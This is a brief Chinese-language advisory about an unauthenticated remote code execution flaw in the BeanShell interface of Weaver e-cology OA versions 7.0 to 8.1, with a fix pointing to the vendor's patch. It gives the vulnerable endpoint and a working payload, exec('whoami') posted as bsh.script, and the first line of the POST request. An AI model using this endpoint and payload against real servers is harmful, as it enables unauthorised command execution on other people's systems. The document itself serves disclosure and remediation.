0x00 前言
泛微OA远程代码执行漏洞,泛微e-cology OA系统的JAVA Beanshell接口可被未授权访问,攻击者调用该Beanshell接口,可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行。
影响版本:7.0
8.0
8.1
0x01 漏洞利用
通过访问泛微协同办公系统weaver/bsh.servlet.BshServlet
,可直接访问Beanshell接口执行任意命令,postbsh.script=exec("whoami");
即可执行命令。
1 | POST /weaver/bsh.servlet.BshServlet HTTP/1.1 |
0x02 修复方式
升级到泛微OA最新版本或安装官方BSH补丁包https://www.weaver.com.cn/cs/securityDownload.asp